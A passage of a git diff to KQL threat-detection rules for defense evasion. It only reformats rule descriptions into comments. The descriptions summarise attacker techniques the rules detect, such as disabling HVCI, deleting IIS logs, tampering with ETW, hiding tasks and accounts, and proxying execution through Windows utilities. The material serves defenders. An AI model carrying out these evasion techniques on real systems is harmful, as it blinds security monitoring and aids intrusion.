tools that rely on this data. This is a powerful defense evasion technique. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql b/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql index 3348ebad..b860c395 100644 --- a/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql +++ b/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql @@ -3,8 +3,7 @@ // Date: 2023-09-15 // Level: medium // Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. -Initial baselining of the allowed extension list is required. - +// Initial baselining of the allowed extension list is required. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 // False Positives: diff --git a/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql b/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql index dad91c95..fb2e098b 100644 --- a/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql +++ b/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql @@ -3,8 +3,7 @@ // Date: 2022-04-02 // Level: medium // Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. -This technique is abused by several malware families to hide their files from normal users. - +// This technique is abused by several malware families to hide their files from normal users. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1564.001 diff --git a/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql b/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql index 37dd097e..c92d3b14 100644 --- a/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql +++ b/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql @@ -3,8 +3,7 @@ // Date: 2022-12-01 // Level: high // Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. -Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter - +// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 diff --git a/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql b/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql index a4f28717..9a6896f9 100644 --- a/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql +++ b/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql @@ -3,7 +3,6 @@ // Date: 2023-12-05 // Level: high // Description: Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion // False Positives: diff --git a/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql b/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql index 0a1af196..2e7b2871 100644 --- a/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql +++ b/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql @@ -3,9 +3,8 @@ // Date: 2022-01-09 // Level: low // Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process. -Certain processes are not typically observed compiling C# code, but can do so without touching disk. -This can be used to unpack a payload for execution - +// Certain processes are not typically observed compiling C# code, but can do so without touching disk. +// This can be used to unpack a payload for execution // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1027.004 diff --git a/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql b/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql index e81ed4dd..d3c5200a 100644 --- a/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql +++ b/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql @@ -3,8 +3,7 @@ // Date: 2020-05-02 // Level: high // Description: Detects changes to environment variables related to ETW logging via the CommandLine. -This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. - +// This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562 // False Positives: diff --git a/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql b/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql index b3cdd5fc..24ad5313 100644 --- a/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql +++ b/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql @@ -3,7 +3,6 @@ // Date: 2019-03-22 // Level: high // Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1070, attack.t1562.006, car.2016-04-002 diff --git a/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql b/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql index 5dbd1388..6178d35d 100644 --- a/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql +++ b/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql @@ -3,9 +3,8 @@ // Date: 2023-01-02 // Level: medium // Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. -This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. -Note that backup software and legitimate administrator might perform similar actions during troubleshooting. - +// This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. +// Note that backup software and legitimate administrator might perform similar actions during troubleshooting. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.002 // False Positives: diff --git a/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql b/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql index 2a81c7e2..eee3239b 100644 --- a/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql +++ b/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql @@ -3,8 +3,7 @@ // Date: 2021-12-09 // Level: medium // Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. -This rule might require some initial baselining to align with some third party tooling in the user environment. - +// This rule might require some initial baselining to align with some third party tooling in the user environment. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion diff --git a/KQL/rules/Defense Evasion/explorer_process_tree_break.kql b/KQL/rules/Defense Evasion/explorer_process_tree_break.kql index fb82928c..d4a193d3 100644 --- a/KQL/rules/Defense Evasion/explorer_process_tree_break.kql +++ b/KQL/rules/Defense Evasion/explorer_process_tree_break.kql @@ -3,8 +3,7 @@ // Date: 2019-06-29 // Level: medium // Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, -which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" - +// which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036 diff --git a/KQL/rules/Defense Evasion/file_deletion_via_del.kql b/KQL/rules/Defense Evasion/file_deletion_via_del.kql index 6509fdd5..10fa132c 100644 --- a/KQL/rules/Defense Evasion/file_deletion_via_del.kql +++ b/KQL/rules/Defense Evasion/file_deletion_via_del.kql @@ -3,10 +3,9 @@ // Date: 2022-01-15 // Level: low // Description: Detects execution of the builtin "del"/"erase" commands in order to delete files. -Adversaries may delete files left behind by the actions of their intrusion activity. -Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. -Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. - +// Adversaries may delete files left behind by the actions of their intrusion activity. +// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. +// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1070.004 // False Positives: diff --git a/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql b/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql index 72b3577d..88c5dd72 100644 --- a/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql +++ b/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql @@ -3,7 +3,6 @@ // Date: 2021-07-13 // Level: medium // Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 diff --git a/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql b/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql index 6bbcad20..d1b3a747 100644 --- a/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql +++ b/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql @@ -3,7 +3,6 @@ // Date: 2022-08-19 // Level: medium // Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 diff --git a/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql b/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql index eade8ee0..bf3cc154 100644 --- a/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql +++ b/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql @@ -3,8 +3,7 @@ // Date: 2024-06-24 // Level: medium // Description: Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). -It is highly recommended to perform an initial baseline before using this rule in production. - +// It is highly recommended to perform an initial baseline before using this rule in production. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036.005 // False Positives: diff --git a/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql b/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql index 050b2c5d..19db18b1 100644 --- a/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql +++ b/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql @@ -3,8 +3,7 @@ // Date: 2020-05-26 // Level: medium // Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). -It is highly recommended to perform an initial baseline before using this rule in production. - +// It is highly recommended to perform an initial baseline before using this rule in production. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036.005 // False Positives: diff --git a/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql b/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql index 53d5ba90..a50dfd4c 100644 --- a/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql +++ b/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql @@ -3,7 +3,6 @@ // Date: 2024-01-05 // Level: high // Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036 diff --git a/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql b/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql index 39f9eaa4..54cd8cbb 100644 --- a/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql +++ b/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql @@ -3,8 +3,7 @@ // Date: 2019-09-26 // Level: high // Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). -Might be used by ransomwares during the attack (seen by NotPetya and others). - +// Might be used by ransomwares during the attack (seen by NotPetya and others). // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1485 // False Positives: diff --git a/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql b/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql index d1537ee7..9ea10c77 100644 --- a/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql @@ -3,7 +3,6 @@ // Date: 2024-01-02 // Level: high // Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562 // False Positives: diff --git a/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql b/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql index 5c14fe30..4be85f32 100644 --- a/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql +++ b/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql @@ -3,8 +3,7 @@ // Date: 2024-08-21 // Level: medium // Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. -When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers. - +// When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 // False Positives: diff --git a/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql b/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql index cc4ed67a..d58aa952 100644 --- a/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql +++ b/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql @@ -3,8 +3,7 @@ // Date: 2022-08-26 // Level: high // Description: Detects when the "index" value of a scheduled task is modified from the registry -Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique) - +// Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique) // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562 // False Positives: diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql index c4871a93..7fe4baed 100644 --- a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql +++ b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql @@ -3,7 +3,6 @@ // Date: 2022-05-14 // Level: medium // Description: Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1564.002 // False Positives: diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql b/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql index 3452769e..abb0fcb4 100644 --- a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql +++ b/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql @@ -3,7 +3,6 @@ // Date: 2023-03-14 // Level: high // Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql b/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql index 916a2541..25a29ba0 100644 --- a/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql +++ b/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql @@ -3,7 +3,6 @@ // Date: 2024-07-05 // Level: high // Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 diff --git a/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql b/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql index a7f6164b..1537c8b3 100644 --- a/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql +++ b/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql @@ -3,7 +3,6 @@ // Date: 2023-09-05 // Level: high // Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion diff --git a/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql b/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql index 0ce16f72..2514a852 100644 --- a/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql +++ b/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql @@ -3,8 +3,7 @@ // Date: 2025-09-02 // Level: medium // Description: Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks. -Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection. - +// Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1070 // False Positives: diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql b/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql index cb39c703..d9e28c68 100644 --- a/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql +++ b/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql @@ -3,8 +3,7 @@ // Date: 2023-08-15 // Level: medium // Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. -This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. - +// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1202 diff --git a/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql b/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql index 2a946f9e..3b7107b1 100644 --- a/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql +++ b/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql @@ -3,8 +3,7 @@ // Date: 2021-11-24 // Level: medium // Description: Detects execution of Microsoft bash launcher with the "-c" flag. -This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. - +// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1202 diff --git a/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql b/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql index 73f5e3d7..ca915d68 100644 --- a/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql +++ b/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql @@ -3,7 +3,6 @@ // Date: 2020-10-05 // Level: low // Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 // False Positives: diff --git a/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql b/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql index 0c3c6c61..18553f29 100644 --- a/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql +++ b/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql @@ -3,9 +3,8 @@ // Date: 2020-04-21 // Level: medium // Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. -The manifest option enables you to install an application by passing in a YAML file directly to the client. -Winget can be used to download and install exe, msi or msix files later. - +// The manifest option enables you to install an application by passing in a YAML file directly to the client. +// Winget can be used to download and install exe, msi or msix files later. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1059 // False Positives: diff --git a/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql b/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql index b44c3773..87951736 100644 --- a/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql +++ b/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql @@ -3,7 +3,6 @@ // Date: 2023-05-16 // Level: medium // Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion // False Positives: diff --git a/KQL/rules/Defense Evasion/jscript_compiler_execution.kql b/KQL/rules/Defense Evasion/jscript_compiler_execution.kql index fea3d976..b490c7ef 100644 --- a/KQL/rules/Defense Evasion/jscript_compiler_execution.kql +++ b/KQL/rules/Defense Evasion/jscript_compiler_execution.kql @@ -3,8 +3,7 @@ // Date: 2022-05-02 // Level: low // Description: Detects the execution of the "jsc.exe" (JScript Compiler). -Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting. - +// Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1127 // False Positives: diff --git a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql b/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql index 14e66001..e7ac1c5e 100644 --- a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql +++ b/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql @@ -3,7 +3,6 @@ // Date: 2023-08-29 // Level: high // Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036.003 diff --git a/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql b/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql index 13072f91..a455041d 100644 --- a/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql +++ b/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql @@ -3,9 +3,8 @@ // Date: 2020-10-14 // Level: medium // Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. -This option may be used adversaries to execute malicious code by signed verified binary. -The debugger is installed alongside with Microsoft Visual Studio package. - +// This option may be used adversaries to execute malicious code by signed verified binary. +// The debugger is installed alongside with Microsoft Visual Studio package. // MITRE Tactic: Defense Evasion // Tags: attack.t1218, attack.defense-evasion // False Positives: diff --git a/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql b/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql index 1c7fddea..a29cf4ec 100644 --- a/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql +++ b/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql @@ -3,8 +3,7 @@ // Date: 2020-10-13 // Level: low // Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces -Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe - +// Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 // False Positives: diff --git a/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql b/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql index e8faa924..7e5e0151 100644 --- a/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql +++ b/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql @@ -3,9 +3,8 @@ // Date: 2024-03-19 // Level: low // Description: Detects changes to the "MaxMpxCt" registry value. -MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. -Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic. - +// MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. +// Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1070.005 diff --git a/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql b/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql index ee270698..b0e242ea 100644 --- a/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql +++ b/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql @@ -3,7 +3,6 @@ // Date: 2022-06-13 // Level: high // Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab). - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218, attack.execution // False Positives: diff --git a/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql b/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql index 59d97807..a312f3c6 100644 --- a/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql +++ b/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql @@ -3,10 +3,9 @@ // Date: 2019-02-22 // Level: high // Description: Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content, -such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications -containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and -execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection. - +// such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications +// containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and +// execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020-1599 // False Positives: diff --git a/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql b/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql index 42e61b24..844173d9 100644 --- a/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql +++ b/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql @@ -3,7 +3,6 @@ // Date: 2022-08-14 // Level: high // Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...) - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution // False Positives: diff --git a/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql b/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql index 6e1c87d7..085455fe 100644 --- a/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql +++ b/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql @@ -3,8 +3,7 @@ // Date: 2022-01-16 // Level: medium // Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. -Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) - +// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218.007 // False Positives: diff --git a/KQL/rules/Defense Evasion/msxsl_exe_execution.kql b/KQL/rules/Defense Evasion/msxsl_exe_execution.kql index 7c3f9335..2801184e 100644 --- a/KQL/rules/Defense Evasion/msxsl_exe_execution.kql +++ b/KQL/rules/Defense Evasion/msxsl_exe_execution.kql @@ -3,8 +3,7 @@ // Date: 2019-10-21 // Level: medium // Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. -Adversaries can abuse this functionality to execute arbitrary files 